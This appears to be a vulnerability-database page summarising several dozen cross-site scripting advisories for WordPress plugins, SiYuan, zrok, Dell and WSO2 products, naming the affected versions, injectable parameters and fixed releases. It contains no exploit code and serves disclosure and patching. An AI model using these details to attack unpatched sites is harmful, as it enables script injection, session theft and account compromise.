Stored cross-site scripting (XSS) in Classroom Bookings up to version 2.17.0 allows authenticated users to inject malicious scripts via the displayname parameter in the User Display Name Handler component, resulting in arbitrary script execution in other users' browsers. The vulnerability requires user interaction (victim must view the affected page) and authenticated access, limiting immediate risk, but publicly available exploit code and vendor confirmation of the issue increase real-world threat. Upgrading to version 2.17.1 resolves the vulnerability.
Dell PowerProtect Data Domain contains a reflected cross-site scripting (XSS) vulnerability affecting DD OS Feature Release versions 7.7.1.0-8.5, LTS2025 versions 8.3.1.0-8.3.1.20, and LTS2024 versions 7.13.1.0-7.13.1.50. A high-privileged remote attacker can inject malicious scripts into the web interface via crafted requests; if a victim administrator views the malicious link, the script executes in their browser context, potentially leading to credential theft, session hijacking, or unauthorized administrative actions. CVSS 5.9 reflects the requirement for high privileges and user interaction, though the wide version range and network accessibility indicate broad exposure across deployed instances.
Stored Cross-Site Scripting in VideoZen WordPress plugin versions up to 1.0.1 allows authenticated administrators to inject arbitrary JavaScript into plugin settings that executes for all users accessing the settings page. The 'lang' POST parameter in the videozen_conf() function is stored without sanitization and output without escaping, enabling privilege-abusing admins to compromise any WordPress installation running the vulnerable plugin. No public exploit code or active exploitation has been identified at time of analysis.
Stored Cross-Site Scripting in WP Statistics plugin (≤14.16.4) allows unauthenticated attackers to inject malicious JavaScript into admin dashboard analytics pages. The vulnerability stems from unsafe handling of utm_source URL parameters that persist into database-backed charts, executing when administrators view Referrals Overview or Social Media pages. With CVSS 7.2 and network vector requiring no authentication, this represents elevated risk for WordPress sites using this analytics plugin, though no active exploitation confirmed at time of analysis.
Stored Cross-Site Scripting in Royal Addons for Elementor plugin versions up to 1.7.1056 allows authenticated attackers with Contributor-level access to inject arbitrary JavaScript via the Instagram Feed widget's 'instagram_follow_text' setting, executing malicious scripts whenever users view affected pages. The vulnerability stems from insufficient input sanitization and output escaping in the widget configuration handler. CVSS 6.4 reflects the moderate severity (network-accessible, no user interaction required from victims, but limited scope to stored XSS with low confidentiality and integrity impact). No public exploit code or active exploitation has been confirmed at time of analysis.
SiYuan is an open-source personal knowledge management system. In versions 3.6.3 and below, Mermaid diagrams are rendered with securityLevel set to "loose", and the resulting SVG is injected into the DOM via innerHTML. This allows attacker-controlled javascript: URLs in Mermaid code blocks to survive into the rendered output. On desktop builds using Electron, windows are created with nodeIntegration enabled and contextIsolation disabled, escalating the stored XSS to arbitrary code execution when a victim opens a note containing a malicious Mermaid block and clicks the rendered diagram node. This issue has been fixed in version 3.6.4.
SiYuan 3.6.1 through 3.6.3 allows arbitrary code execution when users view malicious bazaar packages in the marketplace UI. The vulnerability stems from an incomplete XSS fix (for CVE-2026-33066) that enabled an HTML sanitizer but failed to block iframe tags with srcdoc attributes containing embedded scripts. A malicious package author can inject JavaScript that executes in the Electron process with full application privileges, compromising the user's machine. The issue is confirmed fixed in version 3.6.4 and no public exploitation has been reported at time of analysis.
**Summary** The proxyUi template engine uses Go's text/template (which performs no HTML escaping) instead of html/template. The GitHub OAuth callback handlers in both publicProxy and dynamicProxy embed the attacker-controlled refreshInterval query parameter verbatim into an error message when time.ParseDuration fails, and render that error unescaped into HTML. An attacker can deliver a crafted login URL to a victim; after the victim completes the GitHub OAuth flow, the callback page executes arbitrary JavaScript in the OAuth server's origin. - Attack Vector: Network - the attack is delivered as a crafted URL over the internet. - Attack Complexity: Low - no race conditions or special environment prerequisites. - Privileges Required: None - the attacker needs no account on the zrok instance. - User Interaction: Required - the victim must click the crafted link and complete the GitHub OAuth flow. - Scope: Changed - the injected script executes in the OAuth server's origin, not the victim's share origin. - Confidentiality Impact: Low - the script runs in the OAuth server origin after a failed flow; no session cookie is set at this point, limiting what can be exfiltrated to what is visible in the DOM and what can be requested from the OAuth server. - Integrity Impact: Low - the script can initiate new OAuth flows or submit forms on behalf of the victim in the OAuth server origin. - Availability Impact: None. **Affected Components** - endpoints/proxyUi/template.go - init() / WriteTemplate (lines 8, 18, 99) - text/template used for HTML rendering - endpoints/proxyUi/template.html - line 119 - {{ .Error }} in HTML without escaping - endpoints/publicProxy/providerGithub.go - login callback closure (lines 93, 128, 130) - endpoints/dynamicProxy/providerGithub.go - loginHandler() (lines 110, 146, 148)
The Email Encoder - Protect Email Addresses and Phone Numbers plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'eeb_mailto' shortcode in all versions up to, and including, 2.4.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
The Better Find and Replace - AI-Powered Suggestions plugin for WordPress is vulnerable to Stored Cross-Site Scripting via uploaded image title in versions up to, and including, 1.7.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
The authentication endpoint fails to encode user-supplied input before rendering it in the web page, allowing for script injection. An attacker can leverage this by injecting malicious scripts into the authentication endpoint. This can result in the user's browser being redirected to a malicious website, manipulation of the web page's user interface, or the retrieval of information from the browser. However, session hijacking is not possible due to the httpOnly flag protecting session-related cookies.
The authentication endpoint fails to adequately validate user-supplied input before reflecting it back in the response. Rated medium severity (CVSS 6.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. This Cross-Site Scripting (XSS) vulnerability could allow attackers to inject malicious scripts into web pages viewed by other users.
The WSO2 API Manager developer portal accepts user-supplied input without enforcing expected validation constraints or proper output encoding. Rated medium severity (CVSS 5.4), this vulnerability is remotely exploitable, low attack complexity. This Cross-Site Scripting (XSS) vulnerability could allow attackers to inject malicious scripts into web pages viewed by other users.
Stored Cross-Site Scripting in Prismatic WordPress plugin (all versions ≤3.7.3) allows unauthenticated remote attackers to inject malicious scripts via crafted comment submissions containing the 'prismatic_encoded' pseudo-shortcode. Vulnerable code in prismatic_decode function fails to sanitize user-supplied attributes. CVSS 7.2 with scope change (S:C) elevates impact beyond vulnerable component. EPSS data not available; no CISA KEV listing identified. Wordfence threat intelligence confirms vulnerability; patch released in version 3.7.4 per WordPress plugin repository changelog.
Reflected Cross-Site Scripting in Customer Reviews for WooCommerce plugin allows unauthenticated attackers to inject arbitrary JavaScript via the unescaped 'crsearch' parameter, affecting all versions up to 5.101.0. Exploitation requires social engineering (victim must click a malicious link), but successful attacks can steal session cookies, perform actions as the logged-in user, or redirect to phishing sites. No public exploit code or active exploitation has been identified, though the vulnerability is trivially reproducible given the simple parameter manipulation required.
Stored XSS in WP Maps plugin for WordPress allows authenticated contributors to inject malicious scripts via the 'put_wpgm' shortcode due to insufficient input sanitization and output escaping. Attackers with contributor-level access and above can craft malicious shortcode attributes that persist in page content and execute for all subsequent visitors. All versions up to 4.8.7 are affected; patched version 4.8.8 is available.
Stored Cross-Site Scripting in BetterDocs WordPress plugin versions up to 4.3.8 allows authenticated attackers with contributor-level access to inject arbitrary JavaScript into pages via the 'betterdocs_feedback_form' shortcode due to insufficient input sanitization and output escaping. Injected scripts execute in the browsers of all users who view affected pages, enabling account compromise, credential theft, or malware distribution. No public exploit code or active exploitation has been identified at this time.
Stored cross-site scripting in OPEN-BRAIN WordPress plugin versions up to 0.5.0 allows authenticated administrators to inject malicious scripts via the API Key settings field, which are executed when any user accesses the plugin settings page. The vulnerability stems from improper use of sanitize_text_field() (which does not prevent attribute breakout) combined with missing esc_attr() escaping when outputting the API key to an HTML input value attribute. While exploitation requires administrator-level access, the stored nature means scripts persist and affect all subsequent user interactions with the settings page.
Livemesh Addons for Elementor plugin versions up to 9.0 allow authenticated attackers with Subscriber-level access to inject arbitrary JavaScript via the plugin settings page through missing authorization checks on the AJAX handler lae_admin_ajax() and insufficient output escaping on checkbox fields. The injected scripts execute whenever an administrator accesses the settings page if the attacker obtains a valid nonce, which can be leaked due to improper access control on settings pages. This combination of authorization bypass and stored XSS affects all WordPress installations running the vulnerable plugin.
Stored Cross-Site Scripting (XSS) in Custom New User Notification plugin for WordPress versions up to 1.2.0 allows authenticated administrators to inject arbitrary JavaScript into plugin settings pages via unescaped admin form fields (User Mail Subject, User From Name, User From Email, Admin Mail Subject, Admin From Name, Admin From Email). When any user accesses the plugin settings page, the injected scripts execute in their browser context, enabling privilege escalation in WordPress multisite environments where subsite administrators target super administrators. No public exploit code or active exploitation has been identified; the attack requires Administrator-level credentials, limiting real-world risk despite moderate CVSS score.
Stored cross-site scripting in the Vantage WordPress theme up to version 1.20.32 allows authenticated contributors and higher-privileged users to inject malicious scripts into gallery block text content that execute for all site visitors. The vulnerability stems from insufficient output escaping in the gallery template, enabling attackers with contributor-level access to compromise page integrity and potentially steal session tokens or deface content.
Stored Cross-Site Scripting (XSS) in WP Docs plugin for WordPress (all versions through 2.2.9) allows authenticated attackers with subscriber-level access to inject malicious scripts via the 'wpdocs_options[icon_size]' parameter due to insufficient input sanitization and output escaping. The injected scripts execute in the context of any user accessing the affected page, enabling session hijacking, credential theft, or malware distribution with no user interaction required beyond normal site browsing. No public exploit code has been identified, but the vulnerability is technically straightforward to exploit given valid subscriber credentials.
Stored Cross-Site Scripting (XSS) in CodeColorer plugin for WordPress versions up to 0.10.1 allows unauthenticated attackers to inject malicious JavaScript via the 'class' parameter in the 'cc' comment shortcode, which executes in the browsers of users viewing the affected page. Exploitation requires comments to be enabled and guest comments permitted on the target post. The vulnerability has a CVSS score of 6.1 with low complexity and no authentication required, but user interaction (visiting the affected page) is necessary for the payload to execute.
Quick Facts
- Typical Severity
- MEDIUM
- Category
- web
- Total CVEs
- 38830